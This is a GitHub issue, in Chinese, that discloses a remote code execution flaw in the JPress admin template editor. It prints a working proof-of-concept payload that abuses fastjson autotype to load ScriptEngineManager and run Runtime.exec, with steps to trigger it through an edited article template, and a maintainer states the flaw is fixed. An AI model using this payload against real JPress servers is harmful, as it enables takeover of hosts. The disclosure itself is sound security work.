Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
jpress后台存在模板编辑功能,不过存在些许过滤,我们使用fastjson来辅助获取ScriptEngineManager,然后执行任意js代码,就可以实现rce,payload如下
ScriptEngineManager
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) #set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}')) #set(e=x.getEngineByName("js")) #(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))
弱密码进入后台,修改article模板,加入上面给的payload
点击更新文件
访问http://localhost/article/1,计算器弹出,验证成功
The text was updated successfully, but these errors were encountered:
在 jpress 最新版本中已解决。
Sorry, something went wrong.
No branches or pull requests
审计过程
jpress后台存在模板编辑功能,不过存在些许过滤,我们使用fastjson来辅助获取
ScriptEngineManager,然后执行任意js代码,就可以实现rce,payload如下效果演示
弱密码进入后台,修改article模板,加入上面给的payload
点击更新文件

访问http://localhost/article/1,计算器弹出,验证成功
The text was updated successfully, but these errors were encountered: